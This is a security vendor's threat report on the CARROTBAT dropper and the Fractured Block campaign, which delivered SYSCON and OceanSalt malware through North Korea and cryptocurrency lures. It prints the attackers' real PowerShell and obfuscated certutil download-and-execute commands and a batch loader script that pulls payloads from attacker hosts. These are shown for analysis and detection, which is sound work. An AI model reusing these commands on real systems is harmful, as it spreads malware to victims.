1/18

Josh Grunzweig, Kyle Wilhoit November 29, 2018

The Fractured Block Campaign: CARROTBAT Used to
Deliver Malware Targeting Southeast Asia

unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-
targeting-southeast-asia/

By Josh Grunzweig and Kyle Wilhoit

November 29, 2018 at 6:00 AM

Category: Unit 42

Tags: CARROTBAT, Syscon

This post is also available in: 日本語 (Japanese)

Unit 42 has uncovered a campaign leveraging a previously unreported customized dropper
that is being used to deliver lures primarily pertaining to the South Korea and North Korea
region. These lures revolve around a series of subjects, including various cryptocurrencies,
cryptocurrency exchanges, and political events. Based on various information witnessed
within this dropper, Unit 42 has dubbed this malware family CARROTBAT.

CARROTBAT was initially discovered in an attack on December 2017. This attack was made
against a British government agency using the SYSCON malware family. SYSCON is a
simple remote access Trojan (RAT) that uses the file transfer protocol (FTP) for network
communications. While there is no evidence that this attack against a British government

https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/
https://unit42.paloaltonetworks.com/author/joshgruznweig/
https://unit42.paloaltonetworks.com/author/kyle-wilhoit/
https://unit42.paloaltonetworks.com/category/unit42/
https://unit42.paloaltonetworks.com/tag/carrotbat/
https://unit42.paloaltonetworks.com/tag/syscon/
https://unit42.paloaltonetworks.jp/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/
https://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/


2/18

agency made use of the CARROTBAT dropper, we found overlaps within this attack’s
infrastructure that ultimately lead us to CARROTBAT’s initial discovery, as well as other ties
between these two malware families.

In total, 29 unique CARROTBAT samples have been identified to date, containing a total of
12 confirmed unique decoy documents. These samples began appearing in March of this
year, with the majority of activity taking place within the past 3 months. The payloads vary, as
earlier instances delivered SYSCON, while newer instances are delivering the previously
reported OceanSalt malware family. CARROTBAT and their associated payloads constitute a
campaign that we are dubbing ‘Fractured Block’.

Initial Attack

On December 13, 2017, a spear phishing email was sent from the email address of
yuri.sidorav@yandex[.]ru to a high ranking individual within a British government agency.
This email contained the following subject, with an attached document file of the same name:

US. would talk with North Korea “without precondition”

Within this attached Word document, the following text is displayed:

U.S. would talk with North Korea “without precondition”: Tillerson, By Seungmock Oh

This text references an article that was published on the same day as the attack by
NKNews[.]org. The article in question discusses diplomatic ties between the United States
and North Korea.

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf
https://www.nknews.org/2017/12/u-s-would-talk-with-north-korea-without-precondition-tillerson/


3/18

Figure 1 Article referenced by decoy document in attack against British government agency

The attached document leverages a DDE exploit to ultimately execute the following code:

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/


4/18

1 c:\\windows\\system32\\cmd.exe "/k PowerShell.exe -ExecutionPolicy bypass -
windowstyle hidden -noprofile -command (New-Object
System.Net.WebClient).DownloadFile('https://881.000webhostapp[.]com/0_31.doc',
'%TEMP%\\AAA.exe');Start-Process('%TEMP%\\AAA.exe')

Palo Alto Networks first witnessed this DDE exploit technique in May 2017, and attackers
continue to leverage it. The command run by this particular malware sample attempts to
download a remote executable file named 0_31.doc, which in turn is placed within the
victim’s %TEMP% directory with the filename of AAA.exe prior to being executed.

The payload in question belongs to the SYSCON malware family. It communicates with
ftp.bytehost31[.]org via FTP for command and control (C2).

Figure 2 SYSCON network traffic witnessed during execution

Pivoting on the domain hosting the SYSCON sample, 881.000webhostapp[.]com, revealed a
number of additional samples, including a sample of the KONNI malware family, and four 64-
bit executable files belonging to the CARROTBAT malware family. Pivoting further on
characteristics belonging to CARROTBAT ultimately led to the identification of 29 unique
samples in this malware family.

Fractured Block Campaign

The campaign dubbed Fractured Block encompasses all CARROTBAT samples identified to
date. CARROTBAT itself is a dropper that allows an attacker to drop and open an embedded
decoy file, followed by the execution of a command that will download and run a payload on



5/18

the targeted machine. In total, the following 11 decoy document file formats are supported by
this malware:

doc
.docx
.eml
.hwp
.jpg
.pdf
.png
.ppt
.pptx
.xls
.xlsx

After the embedded decoy document is opened, an obfuscated command such as the
following is executed on the system:

1 C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f
https://881.000webhostapp[.]com/1.txt && ren 1.txt 1.bat && 1.bat && exit

This command will attempt to download and execute a remote file via the Microsoft Windows
built-in certutil utility. More information on this technique and the CARROTBAT malware
family may be found within the Appendix.

The 29 unique CARROTBAT malware samples have compile timestamps between March
2018 to September 2018. Of these 29 unique samples, 11 unique decoy documents were
leveraged in attacks, as seen in the figure below:

https://blog.paloaltonetworks.com/wp-content/uploads/2018/11/fig3.png


6/18

Figure 3 Timeline of decoy documents being dropped by CARROTBAT

A majority of the decoy documents targeting victims in Korea had subject matter related to
cryptocurrencies. In one unique case, the decoy contains a business card belonging to an
individual working at COINVIL, which is an organization that announced plans to build a
cryptocurrency exchange in the Philippines in May 2018.

Additional lure subjects included timely political events, such as relations between the U.S.
and North Korea, as well as a trip by U.S. President Donald Trump to a summit in Singapore.

Payloads for the CARROTBAT samples varied. Originally, between the periods of March
2018 to July 2018, multiple instances of the SYSCON malware family were observed. These
samples communicated with the following hosts via FTP for C2 communication:

ftp.byethost7[.]com
ftp.byethost10[.]com
files.000webhost[.]com

Beginning in June 2018, we observed the OceanSalt malware family being dropped by
CARROTBAT. These samples continue to be used at the time of this writing, and were
observed communicating with the following host for C2 communication:

61.14.210[.]72:7117

Interesting Ties with Other Threat Activity

As stated earlier within this blog, there is infrastructure overlap between the CARROTBAT
and KONNI malware families. KONNI is a RAT that is believed to have  been in use for over
four years, with a wide array of functionalities, often leveraging free web hosting providers
like 000webhost for its C2 infrastructure. This particular malware family has yet to be
attributed to a named group at the time of this writing, however, targeting has historically
focused on the Southeast Asia region.

Another relationship we have mentioned repeatedly is the use of the SYSCON malware
family. This particular malware family was first reported in October 2017 and has been
observed delivering decoy documents pertaining to North Korea. The malware is generally
unsophisticated, making use of remote FTP servers for C2 communication.

Below you can see the KONNI usage highlighted in the gold flags and SYSCON highlighted
in the purple flags.

https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html
https://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/


7/18

Figure 4 Maltego diagram correlating malicious activity

Finally, the third overlap is the OceanSalt malware payload. First reported by McAfee in
October 2018, reported victims include South Korea, the United States, and Canada. Like
the samples outlined in the McAfee report, the OceanSalt samples observed in the Fractured
Block Campaign employed the same code similarities as those of Comment Crew (aka
APT1), however, we believe that these code similarities are a false flag. The malware used
by Comment Crew has been in circulation for many years, and we do not believe the activity
outlined in this blog post has any overlap with the older Comment Crew activity.

https://blog.paloaltonetworks.com/wp-content/uploads/2018/11/carrotbat_fig4.png
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf


8/18

Figure 5 Threat activity overlap over time

Conclusion

Finding CARROTBAT provided an important lynchpin in identifying Fractured Block
Campaign activity. Using CARROTBAT, we were able to find related OceanSalt, SYSCON
and KONNI activity. The various overlaps encountered are notable, and it is our suspicion
that this threat activity may all belong to the same threat actor. However, we do not believe
there to be enough evidence at this time to make this claim with complete certainty.

The CARROTBAT malware family is a somewhat unique dropper and while it supports
various types of decoy documents, and employs rudimentary command obfuscation, it
should be made clear that it is not sophisticated.

While the actors behind Fractured Block remain active,

Palo Alto Networks customers are protected from this threat in the following ways:

AutoFocus customers can track these samples with the FracturedBlock, SYSCON,
KONNI, and CARROTBAT
WildFire detects all files mentioned in this report with malicious verdicts.
Traps blocks all of the files currently associated with the Fractured Block campaign.

A special thanks to Chronicle's VirusTotal team for their assistance researching this threat.

Appendix

CARROTBAT Technical Analysis

For the analysis below, the following sample is used:

MD5 3e4015366126dcdbdcc8b5c508a6d25c

https://blog.paloaltonetworks.com/wp-content/uploads/2018/11/carrotbat_fig5.png
https://autofocus.paloaltonetworks.com/#/tag/Unit42.FracturedBlock
https://autofocus.paloaltonetworks.com/#/tag/Unit42.Syscon
https://autofocus.paloaltonetworks.com/#/tag/Unit42.Konni
https://autofocus.paloaltonetworks.com/#/tag/Unit42.CARROTBAT


9/18

SHA1 f459f9cfbd10b136cafb19cbc233a4c8342ad984

SHA256 aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de

File Type PE32 executable (GUI) Intel 80386, for MS Windows

Compile
Timestamp

2018-09-05 00:17:22 UTC

Upon execution, the malware will read the last 8 bytes of itself. These bytes include two
DWORDs that contain both the length of the embedded decoy document, as well as the type
of file it is.

Figure 6 End of CARROTBAT file containing decoy document information

Using this gathered information, CARROTBAT continues to read the end of itself, minus the
previously retrieved 8 bytes. This data contains the entirety of the embedded decoy
document and is written to the same directory and filename as the original malware sample.
However, the file extension is changed based on the previously retrieved file type value. The
following corresponding values are used by CARROTBAT:

Value Document Extension

0x0 .doc

0x1 .pdf

0x2 .jpg

0x3 .xls

0x4 .xlsx

0x5 .hwp

https://blog.paloaltonetworks.com/wp-content/uploads/2018/11/carrotbat_fig6.png


10/18

0x6 .docx

0x7 .png

0x8 .eml

0x9 .ppt

0xA .pptx

In this particular case, the .hwp file extension is used for the decoy document. After the
decoy is dropped to disk, it is opened in a new process. In this instance, the whitepaper for
the BKN Bank cryptocurrency exchange is displayed to the victim:



11/18

https://blog.paloaltonetworks.com/wp-content/uploads/2018/11/carrotbat_fig7.png
The BKN Project
BKN Z&wWeE
Financial Investments
MPA =At

BKN is the next generation financial investment institution for the blockchain eral
BENG SSA2 AHS Ast AMC MSS SA SSBZIAAUC.

White Paper V.2
OAS ASA HE 2

Problems of Current Cryptocurrency Exchanges ....
Existing ICO ISSUGS .......cccesescseeseeeeeseeeessenecereeeeaes :
Tm ro cece sw IN inne i a en eee ee
WF FE TAMES coicvccees sccccoe vad enmcene preosmeces seus causes cusaice= nqdia) des tenncednmeces stapes neyecnsect veupence unis caqusacseneesnequragees oom eh
PS ITN CNN INCI PN oo wae race vse vuprree cae es seat exe sace cause sues Soy cuneees soon sus ent ress vaiicuen sotses tase secseeciier eveues eine 5
DRG EE AN EN se seca secre reamececencen teeta sease cea nan taee eee cans dee weemeaec et tatces nens otras taveadttmciaraaneuE Dat deeesoraaTE ee 5
BKS Token & BKN Coin Issue

COPPER - 250 USD 00. eecccesseenen sees eee set cane neeen ene eeeees cou seg neeeees ced send see qeeeeeseueseneeeequseeaesesseeeeesoussenmeenees 7
Bronze - 500 USD .....
Silver - 2,000 USD ..... ie
Ra co 00 OC IS see ee eee re enc ees aa tesa pe gentieee eee meres ae rs

Pol ea ay 3 S523 0 NU IS as e a ee iSana 7

BKS Business Model ............ccccccsccessceecessesscessesceeseeseuscenscesseaceae ceases sesasasseasausseasesscnaeeasenaceasensensseneeesannee &
BRN EU ns U Sa pO vcrscarcervareesnreceniatzesworescvactanaentves recteasunrsecusostceusua seu reincastescoseuerwaiiaeceE ierueay neues aetna aaeENe 3

Definitions
20/2) A2|

SEN Coins: Atype of cryptocurrency issued by BKN.
BKN ZPlS BkNO| Beket Apso] ot FALE.

SKS Tokens: A limited edition profit-share token issued by BKN in return for investment capital.
BKS Tokens expire on 15 April 2023.
BKS ESOle} Sl AHS ALO Clot CH7-= Beno| Pekst StyTt ojo! SQ SSAA |

11/18




12/18

Figure 7 HWP decoy document displayed to victim

After this document is displayed, the malware will continue to execute the following
command in a new process:

1 C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f
http://s8877.1apps[.]com/vip/1.txt && ren 1.txt 1.bat && 1.bat && exit

This command will download a remote file using the built-in Microsoft Windows certutil
command. In this particular instance, the following script is retrieved:



13/18

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

@echo off
 
:if exist "%PROGRAMFILES(x86)%" (GOTO 64BITOS) ELSE (GOTO 32BITOS)
 
:32BITOS
certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup.txt > nul
certutil -decode -f setup.txt setup.cab > nul
del /f /q setup.txt > nul
GOTO ISEXIST
 
:64BITOS
:certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup2.txt > nul
:certutil -d^ecode -f setup2.txt setup.cab > nul
:del /f /q setup2.txt > nul
:GOTO ISEXIST
 
:ISEXIST
 
if exist "setup.cab" (GOTO EXECUTE) ELSE (GOTO EXIT)
 
:EXECUTE
ver | findstr /i "10\." > nul
IF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS)
 
:WIN10
expand %TEMP%\setup.cab -F:* %CD% > nul
:if exist "%PROGRAMFILES(x86)%" (rundll32 %TEMP%\drv.dll EntryPoint) ELSE
(rundll32 %TEMP%\drv.dll EntryPoint)
%TEMP%\install.bat
 
GOTO EXIT
 
:OTHEROS
wusa %TEMP%\setup.cab /quiet /extract:%TEMP% > nul
%TEMP%\install.bat
 
GOTO EXIT
 
:EXIT
del /f /q setup.cab > nul
del /f /q %~dpnx0 > nul

This script simply checks the operating system of the victim and downloads the respective
payload again using the certutil executable. In this particular instance, the payload is
encoded via base64, which certutil decodes. The payload in question is a CAB file that is
then unpacked. Finally, the malware executes the extracted install.bat script before deleting
the original files and exiting.



14/18

Figure 8 CARROTBAT downloading final payload via certutil

The downloaded CAB file has the following properties:

MD5 a943e196b83c4acd9c5ce13e4c43b4f4

SHA1 e66e416f300c7efb90c383a7630c9cfe901ff9fd

SHA256 cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62

File Type Microsoft Cabinet archive data, 181248 bytes, 3 files

The following three files and their descriptions are dropped by this CAB file:

https://blog.paloaltonetworks.com/wp-content/uploads/2018/11/Carrotbat_8.png


15/18

Filename Purpose

Install.bat Installation batch script responsible for copying the other files to
C:\Users\Public\Downloads and setting the Run registry key to ensure
persistence. It will also remove any original files before exiting.

DrvUpdate.dll Instance of the OceanSalt malware family.

winnet.ini Encoded C2 information.

The C2 information is stored via the external winnet.ini file and is encoded using an
incremental XOR key. The following function written in Python may be used to decode this
file:

1
2
3
4
5
6
7

def decode(data):
out = ""
c = 0
for d in data:
out += chr(ord(d)^c)
c+=1
return out

Once decoded it is discovered that this instance of OceanSalt attempts to communicate with
61.14.210[.]72 on port 7117.

CARROTBAT Samples

d34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d

8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa

26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847

e218b19252f242a8f10990ddb749f34430d3d7697cbfb6808542f609d2cbf828

824f79a8ee7d8a23a0371fab83de44db6014f4d9bdea90b47620064e232fd3e3

70106ebdbf4411c32596dae3f1ff7bf192b81b0809f8ed1435122bc2a33a2e22

87c50166f2ac41bec7b0f3e3dba20c7264ae83b13e9a6489055912d4201cbdfc

ac23017efc19804de64317cbc90efd63e814b5bb168c300cfec4cfdedf376f4f

d965627a12063172f12d5375c449c3eef505fde1ce4f5566e27ef2882002b5d0

7d443434c302431734caf1d034c054ad80493c4c703d5aaeafa4a931a496b2ae

1142dcc02b9ef34dca2f28c22613a0489a653eb0aeafe1370ca4c00200d479e0



16/18

337b8c2aac80a44f4e7f253a149c65312bc952661169066fe1d4c113348cc27b

92b45e9a3f26b2eef4a86f3dae029f5821cffec78c6c64334055d75dbf2a62ef

42e18ef3aaadac5b40a37ec0b3686c0c2976d65c978a2b685fefe50662876ded

ba78f0a6ce53682942e97b5ad7ec76a2383468a8b6cd5771209812b6410f10cb

dca9bd1c2d068fc9c84a754e4dcf703629fbe2aa33a089cb50a7e33e073f5cea

7d8376057a937573c099e3afe2d8e4b8ec8cb17e46583a2cab1a4ac4b8be1c97

3cbccb059225669dcfdc7542ce28666e0b1a227714eaf4b16869808bffe90b96

aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de

2547b958f7725539e9bba2a1852a163100daa1927bb621b2837bb88007857a48

6c591dddd05a2462e252997dc9d1ba09a9d9049df564d00070c7da36e526a66a

22b16fa7af7b51880faceb33dd556242331daf7b7749cabd9d7c9735fb56aa10

3869c738fa80b1e127f97c0afdb6c2e1c15115f183480777977b8422561980dd

ba100e7bac8672b9fd73f2d0b7f419378f81ffb56830f6e27079cb4a064ba39a

e527ade24beacb2ef940210ba9acb21073e2b0dadcd92f1b8f6acd72b523c828

9fa69bdc731015aa7bdd86cd311443e6f829fa27a9ba0adcd49fa773fb5e7fa9

ffd1e66c2385dae0bb6dda186f004800eb6ceaed132aec2ea42b1ddcf12a5c4e

e3b45b2e5d3e37f8774ae22a21738ae345e44c07ff58f1ab7178a3a43590fddd

a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc

SYSCON Payload Samples

5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b

fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659

fa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5

da94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652

2efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27

62886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb7



17/18

f27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4

0bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f26358

f4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f5084

e8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafc

1c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968

2da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c48

5d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf

0490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f88120b

OceanSalt Payload Samples

59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005

7cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b6

fe8d65287dd40ca0a1fadddc4268268b4a77cdb04a490c1a73aa15b6e4f1dd63

a23f95b4a602bdaef1b58e97843e2f38218554eb57397210a1aaa68508843bd0

59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005

cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62

7ae933ed7fc664df4865840f39bfeaf9daeb3b88dcd921a90366635d59bc15f2

3663e7b197efe91fb7879a56c29fb8ed196815e0145436ee2fad5825c29de897

59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005

7ae933ed7fc664df4865840f39bfeaf9daeb3b88dcd921a90366635d59bc15f2

cf31dac47680ff1375ddaa3720892ed3a7a70d1872ee46e6366e6f93123f58d2

fe186d04ca6afec2578386b971b5ecb189d8381be055790a9e6f78b3f23c9958

Infrastructure

https://881.000webhostapp[.]com/1.txt

http://attach10132.1apps[.]com/1.txt

https://071790.000webhostapp[.]com/1.txt



18/18

https://vnik.000webhostapp[.]com/1.txt

https://7077.000webhostapp[.]com/vic/1.txt

http://a7788.1apps[.]com/att/1.txt

http://s8877.1apps[.]com/vip/1.txt

http://hanbosston.000webhostapp[.]com/1.txt

http://bluemountain.1apps[.]com/1.txt

https://www.webmail-koryogroup[.]com/keep/1.txt

http://filer1.1apps[.]com/1.txt

ftp.byethost7[.]com

ftp.byethost10[.]com

files.000webhost[.]com

webhost[.]com

61.14.210[.]72:7117

Get updates from 
Palo Alto
Networks!

Sign up to receive the latest news, cyber threat intelligence and research from us

By submitting this form, you agree to our Terms of Use and acknowledge our Privacy
Statement.

https://www.paloaltonetworks.com/legal-notices/terms-of-use
https://www.paloaltonetworks.com/legal-notices/privacy